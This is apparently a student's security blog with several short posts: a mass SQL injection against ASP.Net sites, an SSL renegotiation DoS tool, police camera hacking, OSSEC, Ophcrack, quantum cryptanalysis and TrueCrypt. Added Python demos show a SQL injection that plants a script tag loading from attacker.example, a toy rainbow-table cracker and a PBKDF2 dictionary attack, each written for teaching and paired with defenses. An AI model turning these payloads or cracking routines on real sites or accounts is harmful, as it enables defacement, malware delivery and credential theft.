SQL injection attack has compromised nearly 200,000 ASP.Net sites

Hackers are in the midst of a massively successful SQL injection attack targeting websites built on Microsoft’s ASP.Net platform. About 180,000 pages have been affected so far, security researchers say.

The injection writes a <script> tag into text columns of the sites' databases, so every page that renders those columns serves the attacker's JavaScript, which in turn makes the browser load an iframe from one of two remote sites: www3.strongdefenseiz.in and www2.safetosecurity.rr.nu [1].

Fortunately, the attack only succeeds against visitors running an outdated or unpatched browser, or old versions of Adobe Reader, Flash or Java; the iframed content relies on known, already-patched vulnerabilities in those components.

In the company I worked for, the system administrator only released new updates once a month. If this is also the case for many other companies, this window of time would allow for such an attack to be successful. This is always the challenge in computer security. Simply keeping up with the latest threats is a job in and of itself.
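Here is what that kind of injection looks like in code, as an added example that is not from the article or from any of the affected sites. Python's sqlite3 stands in for ASP.NET and SQL Server, and the table, column names, the placeholder script URL and the "edit your own page" endpoint are all assumptions made for the demo:

```python
"""Stored-script mass defacement via SQL injection (added example).

Python/sqlite3 stands in for the ASP.NET/SQL Server sites in the article; the
table, columns, script URL and the update endpoint are constructed for the demo.
"""
import sqlite3

# Constructed payload: a <script> tag pointing at a placeholder attacker host
# (not one of the domains named in the article).
PAYLOAD = '<script src="http://attacker.example/x.js"></script>'


def fresh_db():
    """Three pages with harmless bodies, each owned by a different user."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, owner INTEGER, body TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                   [(1, 1, "hello"), (2, 2, "world"), (3, 3, "news")])
    return db


def update_body_vulnerable(db, owner, body):
    """The flaw: user input is spliced into the statement text."""
    sql = "UPDATE pages SET body='" + body + "' WHERE owner=" + str(owner)
    db.execute(sql)
    db.commit()


def update_body_safe(db, owner, body):
    """The fix: bound parameters, so the input can never change the statement."""
    db.execute("UPDATE pages SET body=? WHERE owner=?", (body, owner))
    db.commit()


def infected_pages(db):
    """Ids of pages whose stored body would emit the attacker's script."""
    rows = db.execute("SELECT id FROM pages WHERE body LIKE ? ORDER BY id",
                      ("%" + PAYLOAD + "%",)).fetchall()
    return [r[0] for r in rows]


def attack(update):
    """Run one update function as user 1 with an injecting body; return infected ids."""
    db = fresh_db()
    # The quote closes the string literal, 'WHERE 1=1' matches every row, and
    # '--' comments out the owner check that should have scoped the update.
    evil_body = PAYLOAD + "' WHERE 1=1 --"
    update(db, 1, evil_body)
    return infected_pages(db)


if __name__ == "__main__":
    print("vulnerable:", attack(update_body_vulnerable))   # every page defaced
    print("safe:      ", attack(update_body_safe))         # only the attacker's own page
```

Note that the parameterized version still stores the attacker's text in his own row; keeping script out of the rendered page is the job of output encoding, not of the query. The injection is what turns one user's scribble into a defacement of every page in the database.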

[1] http://www.infoworld.com/d/security/massive-sql-injection-attack-has-comprised-nearly-200000-aspnet-sites-176667

Accused Chinese cyber-spy on trial for stealing Motorola secrets

A software engineer by the name of Hanjuan Jin was arrested at Chicago O’Hare International Airport, ready to depart via a one-way ticket to China. Along with $30,000, she was carrying more than 1,000 electronic and paper documents from her former employer (she had just quit Motorola) as well as Chinese documents for military telecommunications technology, according to the FBI affidavit filed in court as part of the case. [1]

However, she has pleaded not guilty. Sounds to me like she was caught red-handed. According to the article, this happens with Chinese nationals quite often. In my opinion, if the United States didn’t have such weak foreign policy this wouldn’t be happening as often as it does.

[1] http://www.networkworld.com/news/2011/110711-hanjuan-jin-trial-252830.html

Attack Tool Exploits SSL Vulnerability to Create DoS Attack

“A German hacker group has released a new proof-of-concept tool for denial of service (DoS) attacks that exploits a weakness in SSL.

According to the group, known as The Hackers Choice (THC), the SSL vulnerability can be used to kick a server off the Internet.” [1]

A denial of service attack is probably the most widespread attack out there and the easiest for a novice to carry out. It is especially popular with “hacktivist” groups because of its simplicity and the lack of real knowledge it requires. There are many ways to accomplish a DoS attack, and the article addresses one that has recently been brought to the foreground. According to the article, establishing an SSL connection costs the server about 15 times more processing power than it costs the client [1]. THC’s tool turns that asymmetry against the server. Specifically, it targets SSL renegotiation, a feature that lets a client ask for a fresh handshake on an already-established connection, so the server repeats its expensive private-key operation without the client having to open a new TCP connection. The tool requests thousands of renegotiations over a single TCP connection, which eats up the server’s processing power and ultimately results in DoS. The group claims (and I agree) that SSL renegotiation is stupid. If you’re not happy with the key, terminate the connection and start a new one. This tool mainly targets servers that have renegotiation enabled.

One way of mitigating this tool’s effect is to disable client-initiated SSL renegotiation and use SSL accelerator hardware. But the group claims that even that will not stop the tool completely [1]: without renegotiation the attacker simply opens a new TCP connection for every handshake, which costs more on the attacking side but still puts the expensive end of the handshake on the server.

[1] http://www.securityweek.com/attack-tool-exploits-ssl-vulnerability-create-dos-attack

Owning a Cop Car

A security researcher named Kevin Finisterre managed to tap into the live video feed of a police cruiser camera. He was able to do this because the systems the police department used were insecure and relied on cleartext protocols such as FTP and telnet. Due to a configuration error, no authentication was required, and Mr. Finisterre was able to stream live video from the camera of a police cruiser.

The documentation of his audit can be found at http://www.digitalmunition.com/OwningCopCar.pdf

I came across this story a while ago but it is still pretty interesting. Imagine the possibilities.

IT Security Budgets Cut

“It’s been a tumultuous decade for IT spending. In the recession that started in late 2000, many enterprises slashed IT investments wherever they could, except for IT security, which saw many businesses increase investments. Then, following the financial and mortgage meltdown, after a few years of growth, IT budgets remained flat, while investments in security and regulatory compliance initiatives still managed to remain strong.

Today, the relative strength of IT security spending compared to other aspects of IT is starting to show its age. According to the responses to this year’s CSO/CIO/PwC Global Information Security Survey, more enterprises are deferring IT security spending and cutting costs where possible. In fact, nearly half of all of those surveyed said they trimmed security costs last year. While only a slim majority, 51%, said they will increase security spending next year.” (http://www.networkworld.com/news/2011/101311-a-penny-251939.html)

Not something you really want to hear as an IT security student, am I right? IT security is not an asset; it’s a liability. Unless you work for a place like McAfee, Symantec, or a penetration testing company, your job and what you do costs the business money that could be spent elsewhere.

The first job I ever had, my boss told me “You should always keep in mind two things: Save me money, and make me money.” Good words to live by in my opinion. The head honchos are always looking for ways to save and make money and having a huge security budget generally does not help, unless you can spin it as a selling point. For example if you’re a bank, it would be a good draw for customers to know that you have “the world’s most secure systems”.

Host-based Intrusion Detection System OSSEC

While on my co-op, I was tasked with deploying a HIDS on the servers in order to comply with the information security standard. The previous co-op student had started implementing OSSEC, which stands for Open Source Security. One of the major “selling points” was that it is free, open-source software (GNU General Public License, version 3). [1]

“OSSEC is a scalable, multi-platform, open source Host-based Intrusion Detection System (HIDS). It has a powerful correlation and analysis engine, integrating log analysis, file integrity checking, Windows registry monitoring, centralized policy enforcement, rootkit detection, real-time alerting and active response.” [1]

The server was relatively easy to set up (I wasn’t that comfortable with Ubuntu when I first started) and the OSSEC agent was very easy to install. First, you set up the server and register each agent there with a hostname, an IP address, and an ID that you give it. Once an agent is registered on the server, you extract its key (the manage_agents utility does both the registration and the extraction), copy it out of the PuTTY session, and paste it into the OSSEC Windows agent’s key field. After that it’s as simple as starting the agent on the monitored host.

OSSEC saves daily log files in a compressed format on the server (.tar.gz if I remember correctly). These can get rather large, even when compressed, after a period of time. Luckily, our security standard only called for 3 months of record keeping.

The downside of this software is the huge number of false positives it generates. OSSEC rates each event by assigning it a ‘level’ from 0 to 15. Generally level 7 and below are harmless and levels 10 – 15 are what you want to be apprised of. Our standard, however, required us to log EVERYTHING. This meant thousands of redundant WINDOWS AUDIT FAILURE events saved to the logs. There is a way to suppress certain event codes (like Windows Audit Failure) by adding a local rule that overrides their level to 0, but again, we were required to log every single event.

It is very time-consuming to read through hundreds of pages of logs looking for threats, so I looked for log consolidation software that would organize them better and make them more readable, and I found Logwatch. Logwatch broke the logs up into sections and sent a daily email with its report. This was OK for a couple of days but when I had all 8 servers reporting to the OSSEC server, the log sizes grew very large and the email server truncated the attachment automatically.
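Since the standard forced us to keep everything, the practical trick is to keep the raw alerts but read them through a filter. The following is an added example, not OSSEC’s or Logwatch’s code: it parses a constructed alerts.log excerpt laid out the way OSSEC writes it, counts alerts per rule, and separates the level 10 and above alerts from the noise. The host names, addresses and log lines are made up for the demo, and the rule ids are used only as sample data:

```python
"""Summarise an OSSEC-style alerts.log by rule and level (added example).

The excerpt below is constructed in the layout OSSEC uses for alerts.log:
a '** Alert' header, a timestamp/source line, a 'Rule:' line, the raw log
line(s), then a blank line. Hosts, addresses and messages are made up.
"""
import re
from collections import Counter

SAMPLE_LOG = """\
** Alert 1320141601.100: - windows,authentication_failed,
2011 Nov 01 10:00:01 (fileserver) 10.0.0.5->WinEvtLog
Rule: 18105 (level 4) -> 'Windows Logon Failure.'
WinEvtLog: Security: AUDIT_FAILURE(4625): Microsoft-Windows-Security-Auditing: (no user): no domain: FILESERVER: An account failed to log on.

** Alert 1320141602.101: - windows,authentication_failed,
2011 Nov 01 10:00:02 (fileserver) 10.0.0.5->WinEvtLog
Rule: 18105 (level 4) -> 'Windows Logon Failure.'
WinEvtLog: Security: AUDIT_FAILURE(4625): Microsoft-Windows-Security-Auditing: (no user): no domain: FILESERVER: An account failed to log on.

** Alert 1320141603.102: - windows,authentication_failed,
2011 Nov 01 10:00:03 (dc1) 10.0.0.2->WinEvtLog
Rule: 18105 (level 4) -> 'Windows Logon Failure.'
WinEvtLog: Security: AUDIT_FAILURE(4625): Microsoft-Windows-Security-Auditing: (no user): no domain: DC1: An account failed to log on.

** Alert 1320141609.103: mail - syslog,sshd,authentication_failures,
2011 Nov 01 10:00:09 (web1) 10.0.0.7->/var/log/auth.log
Rule: 5712 (level 10) -> 'SSHD brute force trying to get access to the system.'
Nov  1 10:00:09 web1 sshd[2201]: Failed password for invalid user admin from 198.51.100.9 port 4410 ssh2
"""

ALERT_HEADER = re.compile(r"^\*\* Alert (\d+)\.\d+: (mail )?- (.*)$")
RULE_LINE = re.compile(r"^Rule: (\d+) \(level (\d+)\) -> '(.*)'$")
SOURCE_LINE = re.compile(r"^\d{4} \w{3} \d{2} \d{2}:\d{2}:\d{2} \((\S+)\) (\S+)->(\S+)$")


def parse_alerts(text):
    """Return one dict per alert: time, groups, host, rule, level, description, log lines."""
    alerts = []
    current = None
    for line in text.splitlines():
        m = ALERT_HEADER.match(line)
        if m:
            current = {"time": int(m.group(1)), "mail": bool(m.group(2)),
                       "groups": m.group(3).strip(",").split(","), "log": []}
            alerts.append(current)
            continue
        if current is None or not line.strip():
            continue
        m = RULE_LINE.match(line)
        if m:
            current["rule"] = int(m.group(1))
            current["level"] = int(m.group(2))
            current["description"] = m.group(3)
            continue
        m = SOURCE_LINE.match(line)
        if m:
            current["host"], current["ip"], current["location"] = m.groups()
            continue
        current["log"].append(line)          # the raw event text OSSEC matched
    return alerts


def summarize(alerts, min_level):
    """Count alerts at or above min_level per (rule, description).

    Returns (Counter, number_of_alerts_below_the_threshold); the suppressed
    alerts stay in the raw log, they are just kept out of the daily read.
    """
    counts = Counter()
    suppressed = 0
    for a in alerts:
        if a["level"] >= min_level:
            counts[(a["rule"], a["description"])] += 1
        else:
            suppressed += 1
    return counts, suppressed


def report(text, min_level=10):
    """Human-readable digest: what needs attention, and how much noise was hidden."""
    counts, suppressed = summarize(parse_alerts(text), min_level)
    lines = ["%5d  rule %d  %s" % (n, rule, desc)
             for (rule, desc), n in counts.most_common()]
    lines.append("(%d alerts below level %d not shown)" % (suppressed, min_level))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_LOG))
```

Run against a real alerts.log, the same code gives you the short list to read each morning while the complete log stays on disk for the 3-month retention the standard asked for.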

I talk about the drawbacks to OSSEC because you probably won’t read about it elsewhere. You can read about its accolades at http://www.ossec.net. It did seem to do its job well.

[1] http://www.ossec.net/main/about

Ophcrack Password Cracker

We talked about passwords in class and heard Professor F tell his story about guessing people’s passwords. Well, unless you have that kind of talent for guessing, you probably don’t want to go through that frustration. On my job, my boss gave me a computer to install something on but didn’t tell me the password, so I couldn’t log in to install the program. I would’ve asked him for it but he was gone from his office for an appointment for half the day. It was nothing that couldn’t have waited until he got back, but I thought I’d give a password cracking tool a shot so I could get the job done (I should mention that this was an OK thing for me to do but not for other employees). After browsing for a little while I came across Ophcrack on http://pcsupport.about.com/od/toolsofthetrade/tp/passrecovery.htm and read that it “is by far the best free Windows password recovery tool available” [1]. It uses precomputed rainbow tables to recover the password from the Windows LM or NT hash, rather than guessing passwords live. So I burned it to a LiveCD, popped it into the drive of the machine and rebooted. It ran for about 10 minutes and came up with nothing.

The downside is that the free tables only cover a limited keyspace. The free XP tables target the LM hash, which Windows only stores for passwords of 14 characters or fewer, and they only cover alphanumeric characters; anything outside that set is simply not in the table, no matter how long the tool runs. When my boss finally came back and entered the password I could tell it was longer than 14 characters and had symbols in it as well. Good on him for having a strong password but it was kind of annoying that Ophcrack didn’t work. There are rainbow tables that you can buy that use a larger charset – http://ophcrack.sourceforge.net/tables.php [2] – but we like to keep things free whenever possible. Go ahead and give it a shot if you’d like, to see if your password can be cracked. It is pretty easy to protect against this. Just make sure:

1. Your password is longer than 14 characters (Windows then stores no LM hash at all, so the LM tables have nothing to work with)

2. Your password has lowercase and uppercase letters, numbers, and symbols, so it falls outside the character sets the free tables cover

3. Disable booting from CDs and USB drives and set an administrator password on your BIOS, bearing in mind that someone with physical access can still pull the drive out; full-disk encryption is what actually protects the hashes on disk.
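To make the “not in the table” point concrete, here is a miniature rainbow table as an added example. It is not Ophcrack’s code: SHA-1 stands in for the Windows LM/NT hash, and the tiny charset, fixed length and chain parameters are chosen so it builds and searches in about a second. The one thing it shares with the real tables is the limitation, a password outside the covered charset or length is never found, no matter how long you wait:

```python
"""A miniature rainbow table (added example, not Ophcrack's code).

SHA-1 stands in for the LM/NT hash; CHARSET, LENGTH and CHAIN_LEN are demo
values. A real table covers a much larger keyspace but has exactly the same
blind spot: passwords outside its charset or length are never recovered.
"""
import hashlib
import itertools

CHARSET = "abcdefgh"   # keyspace the table covers (assumed for the demo)
LENGTH = 4             # fixed password length the table covers
CHAIN_LEN = 16         # hashes per chain
SPACE = len(CHARSET) ** LENGTH


def H(password):
    """Stand-in for the LM/NT hash function."""
    return hashlib.sha1(password.encode()).digest()


def reduce_hash(digest, step):
    """Map a digest back to a candidate password inside the keyspace.

    The step number is mixed in so that two chains colliding at different
    positions do not merge into one (the 'rainbow' part of the name).
    """
    n = (int.from_bytes(digest[:8], "big") + step) % SPACE
    chars = []
    for _ in range(LENGTH):
        n, r = divmod(n, len(CHARSET))
        chars.append(CHARSET[r])
    return "".join(chars)


def build_table(starts):
    """Precompute chains and store only endpoint -> start: that is the space saving."""
    table = {}
    for start in starts:
        p = start
        for step in range(CHAIN_LEN):
            p = reduce_hash(H(p), step)
        table.setdefault(p, start)
    return table


def crack(table, target):
    """Recover the password for `target` if any chain covers it, else None."""
    for i in range(CHAIN_LEN - 1, -1, -1):
        # Assume the target sits at position i of some chain; finish that chain.
        p = reduce_hash(target, i)
        for step in range(i + 1, CHAIN_LEN):
            p = reduce_hash(H(p), step)
        if p in table:
            # Candidate chain found: walk it from the start and check each hash.
            # A merged chain can produce a false alarm, so the check is required.
            q = table[p]
            for step in range(CHAIN_LEN):
                if H(q) == target:
                    return q
                q = reduce_hash(H(q), step)
    return None


def demo_table():
    """Chains starting from every 8th password of the keyspace (512 chains)."""
    every = ("".join(t) for t in itertools.product(CHARSET, repeat=LENGTH))
    return build_table(itertools.islice(every, 0, None, 8))


def coverage(table):
    """Fraction of the keyspace the table actually recovers (merges lose some)."""
    hits = 0
    for t in itertools.product(CHARSET, repeat=LENGTH):
        pw = "".join(t)
        if crack(table, H(pw)) == pw:
            hits += 1
    return hits / SPACE


if __name__ == "__main__":
    table = demo_table()
    print("coverage of the 8^4 keyspace:", round(coverage(table), 2))
    print("crack('abcd'):", crack(table, H("abcd")))
    print("crack('Zz!9'):", crack(table, H("Zz!9")))   # outside charset: never found
```

Storing 512 endpoints instead of 4096 hashes is the trade: lookups cost a few hundred hash operations instead of one, and chain merges mean the table never covers quite the whole keyspace. Scale the charset to “alphanumeric” and the length to 14 and you have the free XP tables; add symbols and you have the ones you pay for.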

 

References:

[1] http://pcsupport.about.com/od/toolsofthetrade/tp/passrecovery.htm

[2] http://ophcrack.sourceforge.net/tables.php

Quantum Computing Continues to Evolve

Although still in its infancy, quantum computing is making some impressive strides forward. [1] We aren’t computer engineering students but it is important to understand, as security conscious individuals, the implications to computer security posed by quantum computers. Namely, cryptanalysis. Cryptanalysis is basically trying to find a way to read an encrypted message without having the key. Messages are encrypted using a cipher. An example of a cipher is RSA. The strength of such a cipher lies in the mathematical algorithm (trapdoor function) used to create the keys, the key size, and the limited computational power available to potential attackers. RSA key generation picks two VERY large prime numbers (the larger the better) and publishes their product as part of the public key. If the attacker wants to read a message without the private key, he has to factor that product back into the two primes. Prime factorization is the biggest threat to a cipher like RSA or the Rabin cryptosystem. Using computers available today, it could take years upon years to factor a key of the sizes in use. A large enough quantum computer changes that: Shor’s algorithm factors in polynomial time, so the work that is infeasible today becomes tractable.

From Wikipedia:

“Consider a problem that has these four properties:

  1. The only way to solve it is to guess answers repeatedly and check them,
  2. The number of possible answers to check is the same as the number of inputs,
  3. Every possible answer takes the same amount of time to check, and
  4. There are no clues about which answers might be better: generating possibilities randomly is just as good as checking them in some special order.

An example of this is a password cracker that attempts to guess the password for an encrypted file (assuming that the password has a maximum possible length).

For problems with all four properties, the time for a quantum computer to solve this will be proportional to the square root of the number of inputs. That can be a very large speedup, reducing some problems from years to seconds.” [2]
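To see where the square root comes from, here is a tiny simulation of Grover’s algorithm on a classical computer, added as an example (it is not from either reference). It runs the oracle/diffusion loop on an explicit list of N amplitudes, so it is exponentially slow and proves nothing about real hardware, but it does show that the number of oracle queries needed to find the marked item grows as the square root of N rather than N:

```python
"""Grover search on a classical state-vector simulator (added example).

The list `amp` holds one amplitude per candidate answer. Each iteration
applies the oracle (flip the sign of the right answer) and the diffusion step
(reflect every amplitude about the mean). After about pi/4 * sqrt(N) rounds the
right answer carries almost all of the probability.
"""
import math


def grover_iterations(n_items):
    """Optimal number of iterations, floor(pi/4 * sqrt(N)); one oracle query each."""
    return int(math.pi / 4 * math.sqrt(n_items))


def grover_search(n_items, marked, iterations=None):
    """Return (most_likely_index, probability_of_marked, oracle_queries_used)."""
    if iterations is None:
        iterations = grover_iterations(n_items)
    amp = [1 / math.sqrt(n_items)] * n_items          # uniform superposition
    for _ in range(iterations):
        amp[marked] = -amp[marked]                    # oracle: phase flip on the answer
        mean = sum(amp) / n_items
        amp = [2 * mean - a for a in amp]             # diffusion: inversion about the mean
    probs = [a * a for a in amp]                      # measurement probabilities
    best = max(range(n_items), key=probs.__getitem__)
    return best, probs[marked], iterations


def classical_expected_queries(n_items):
    """Unstructured classical search checks N/2 candidates on average."""
    return n_items / 2


if __name__ == "__main__":
    for n in (16, 256, 4096):
        best, p, k = grover_search(n, marked=n // 3)
        print("N=%5d  queries=%3d (classical avg %6.0f)  P(marked)=%.4f  found=%s"
              % (n, k, classical_expected_queries(n), p, best == n // 3))
```

The point of the table it prints is the middle column: 4096 candidates take about 50 oracle queries instead of 2048. Against a k-bit symmetric key that is 2^(k/2) work instead of 2^k, which is a big speedup but nothing like the collapse Shor’s algorithm causes for factoring.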

So who knows? In a decade, cryptosystems considered strong today may be totally useless (much like what happened to WEP). The caveat is that the two speedups are very different in size. Shor’s algorithm is what breaks RSA and the other public-key schemes built on factoring or discrete logarithms outright, while the square-root speedup quoted above is all a quantum computer gets against a symmetric cipher like AES: 2^128 guesses against AES-128 become roughly 2^64, so the fix for symmetric crypto is simply a longer key, and AES-256 keeps 128 bits of security.

References:

[1] http://www.sciencedaily.com/releases/2011/08/110831115808.htm

[2] http://en.wikipedia.org/wiki/Quantum_computer#Potential

Protect Your Hard Drive

While on co-op I was tasked with encrypting the hard drives of the company laptops. The newer laptops with Windows 7 already had BitLocker but we wanted something flexible and preferably open-source to use for all operating systems. TrueCrypt matched the requirements very well. It has several encryption algorithms to choose from: AES, Serpent, Twofish, and the cascades AES-Twofish, AES-Twofish-Serpent, Serpent-AES, Serpent-Twofish-AES, and Twofish-Serpent. All of them use 256-bit keys and a 128-bit block size (a cascade uses an independent 256-bit key for each cipher in it). TrueCrypt uses RIPEMD-160 by default, but you can also choose SHA-512 or Whirlpool; the hash is used inside HMAC by the PBKDF2 key derivation that turns your password into the key protecting the volume header. If you are wondering how secure it is take a moment to read about Operation Satyagraha.

In 2008, a Brazilian banker (who had his hard drives encrypted with TrueCrypt) suspected of fraud was arrested. His hard drives were examined by the Brazilian National Institute of Criminology (INC) for months until they asked the US Government for help in cracking the drives. The FBI ran dictionary attacks for an entire year before throwing in the towel and giving them back to the Brazilian government. So to the ultra paranoid: If the FBI couldn’t crack TrueCrypt, you know it’s good. Note what the story actually shows, though: nobody broke the cipher. They attacked the passphrase and failed because it was not in their dictionaries, so a weak passphrase would have undone all of it. There is no back door for TrueCrypt and the creators are anonymous. Even if the government subpoenaed TrueCrypt’s creators to crack the password on a hard drive for a high profile case, there would be nothing they could do.
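Since the passphrase is what gets attacked, here is the shape of that attack as an added example (not TrueCrypt’s code). TrueCrypt derives the header key from the passphrase with PBKDF2 over one of the HMACs mentioned above; this sketch uses Python’s PBKDF2-HMAC-SHA-512 with an assumed iteration count and salt, and a simplified “header tag” check stands in for decrypting the real header, whose check looks for a magic value and a CRC. The wordlist is constructed:

```python
"""Dictionary attack against a PBKDF2-protected volume header (added example).

Not TrueCrypt's code: ITERATIONS, SALT and the HMAC "tag" used to test a
candidate passphrase are stand-ins for the real header format. What carries
over is the cost model: every guess has to repeat the whole key derivation.
"""
import hashlib
import hmac
import time

ITERATIONS = 1000                   # assumed for the demo
SALT = b"constructed-16B-salt"      # constructed; a real volume uses a random salt
WORDLIST = ["123456", "password", "letmein", "qwerty", "correcthorse"]  # constructed


def derive_header_key(passphrase, salt, iterations=ITERATIONS):
    """PBKDF2-HMAC-SHA-512: each guess costs `iterations` HMAC computations."""
    return hashlib.pbkdf2_hmac("sha512", passphrase.encode("utf-8"), salt, iterations, 64)


def make_volume(passphrase, salt=SALT):
    """Stand-in for writing an encrypted header: keep the salt and a tag that
    only the right key reproduces (the real header is decrypted and checked
    for its magic value and CRC instead)."""
    key = derive_header_key(passphrase, salt)
    return {"salt": salt, "tag": hmac.new(key, b"TRUE", "sha256").digest()}


def try_passphrase(volume, candidate):
    """One guess: derive the key and see whether the header check passes."""
    key = derive_header_key(candidate, volume["salt"])
    tag = hmac.new(key, b"TRUE", "sha256").digest()
    return hmac.compare_digest(tag, volume["tag"])


def dictionary_attack(volume, wordlist):
    """Return the first passphrase in the list that opens the volume, else None."""
    for word in wordlist:
        if try_passphrase(volume, word):
            return word
    return None


def guess_rate(volume, sample=20):
    """Guesses per second on this machine, single core, no GPU."""
    t0 = time.perf_counter()
    for i in range(sample):
        try_passphrase(volume, "probe%d" % i)
    return sample / (time.perf_counter() - t0)


def seconds_to_exhaust(candidates, rate):
    """How long a list of `candidates` guesses takes at `rate` guesses/second."""
    return candidates / rate


if __name__ == "__main__":
    weak = make_volume("letmein")
    strong = make_volume("Tr0ub4dor&3 plus several more words")
    print("weak volume opened with:", dictionary_attack(weak, WORDLIST))
    print("strong volume opened with:", dictionary_attack(strong, WORDLIST))
    rate = guess_rate(weak)
    print("about %.0f guesses/s here; 10^9 candidates would take %.1f days"
          % (rate, seconds_to_exhaust(1e9, rate) / 86400))
```

The iteration count is the only knob the software controls; everything else is the passphrase. Raising iterations slows the attacker and you by the same factor, which is why adding a few words to the passphrase is worth far more than any cipher choice in the list above.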

Using it is easy. Just download and install it from http://www.truecrypt.org. Then follow the instructions on their website. When you encrypt your system drive, TrueCrypt makes you create a “rescue disc”; it holds a backup of the boot loader and volume header so you can recover from corruption, but it does not bypass or recover the password. You will need to remember your password, because if you forget it, neither the rescue disc nor anyone else can get your data back. Every time you boot your machine, you will need to enter your password.

TrueCrypt will do its job at encrypting your data and keeping it safe from prying eyes when you’re not around. But like the cartoon on Professor F’s lecture slide shows, if someone really wants your password, they will bludgeon you with a pipe until you spill your guts (figuratively or literally).

TrueCrypt: http://www.truecrypt.org/

Operation Satyagraha: http://en.wikipedia.org/wiki/TrueCrypt#Operation_Satyagraha

BitLocker vs TrueCrypt: http://www.tomshardware.com/reviews/bitlocker-truecrypt-encryption,2587.html

There are pros and cons to both BitLocker and TrueCrypt but while at my job I decided TrueCrypt was the way to go. I just thought I’d bring this software to everyone’s attention if they haven’t heard of it already.